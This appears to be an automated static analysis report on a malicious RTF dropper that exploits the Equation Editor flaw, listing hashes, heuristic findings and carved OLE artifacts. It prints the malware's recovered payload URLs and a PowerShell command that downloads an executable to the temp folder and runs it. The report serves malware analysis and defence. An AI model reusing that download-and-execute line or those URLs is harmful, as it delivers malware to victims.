Rtf.Dropper.Agent-7121046-0 — RTF malware analysis

Static analysis result for SHA-256 64a73552356e5404…

MALICIOUS

RTF

47.5 KB First seen: 2019-05-16
MD5: 45de8d0447d08540f140480468b61e80 SHA-1: f0b3aeaddf8cbb0ec98309efcaafe427c8843eb2 SHA-256: 64a73552356e540436bf362e68118615f3bea4e3bdb987e2bbd5b51570aa1f6f
262 Risk Score

Malware Insights

Rtf.Dropper.Agent-7121046-0 · confidence 95%

MITRE ATT&CK
T1203 Exploitation for Client Execution

The RTF file contains multiple indicators of malicious activity, including embedded OLE objects and a critical finding related to the Equation Editor CLSID, suggesting exploitation of a known vulnerability. The ClamAV detection and heuristic firings confirm its nature as a dropper. The embedded URLs likely point to the location of the second-stage payload.

Heuristics 7

  • Equation Editor CLSID critical CVE likely RTF_EQUATION_EDITOR
    Equation Editor OLE CLSID found inside an OLE object — exploited by CVE-2017-11882 / CVE-2018-0802 / CVE-2018-0798
  • ClamAV: Rtf.Dropper.Agent-7121046-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Rtf.Dropper.Agent-7121046-0
  • Suspicious extracted artifact critical EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • \objupdate forces OLE activation high RTF_OBJUPDATE
    RTF contains \objupdate — forces automatic OLE object instantiation when the document is opened, bypassing user interaction. Almost exclusively seen in Equation Editor exploit documents.
  • OLE object data medium RTF_OBJDATA
    RTF contains 5 \objdata section(s) — embedded OLE objects
  • OlePres presentation stream in RTF OLE object medium RTF_OLEPRES_STREAM
    RTF contains an embedded OLE object with an OlePres presentation stream. OlePres is an OLE presentation marker and is not enough on its own to identify CVE-2025-21298.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://basedow-bilder.de/gando.bin In RTF body
    • http://chimachinenow.com/gando.binIn RTF body
    • http://chimachineIn RTF body

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
objdata_00_off00004143.bin rtf-objdata-decoded RTF \objdata at offset 0x4143 377 bytes
SHA-256: 9f9df4f20bf46ffe79f02ef9500bcd656d2853d076bd9955c086799dc82c74b0
objdata_01_off00006004.bin rtf-objdata-decoded RTF \objdata at offset 0x6004 221 bytes
SHA-256: ad609ffc162a8f2c51146179a90ce98f4af7f47c54c9abe165f6c6d053ed0b92
objdata_02_off00006220.bin rtf-objdata-decoded RTF \objdata at offset 0x6220 473 bytes
SHA-256: 61f6d85d47d064d2962ee97f51c45500b73e982aa987cec6c7bee469177d592c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered URL(s): http://basedow-bilder.de/gando.bin, http://chimachine Static shellcode analysis recovered command string(s): PowerShell ""function etrovlev([String] $foolpede){(New-Object System.Net.WebClient).DownloadFile($foolpede,'%TEMP%\paulacraig.exe');Start-Process '%TEMP%\paulacraig.exe'
objdata_03_off00006dfe.bin rtf-objdata-decoded RTF \objdata at offset 0x6DFE 4681 bytes
SHA-256: 2739ee55bfe1b2a7508c33fd0cfd32fd82a891d81959369110cce62e729ae09e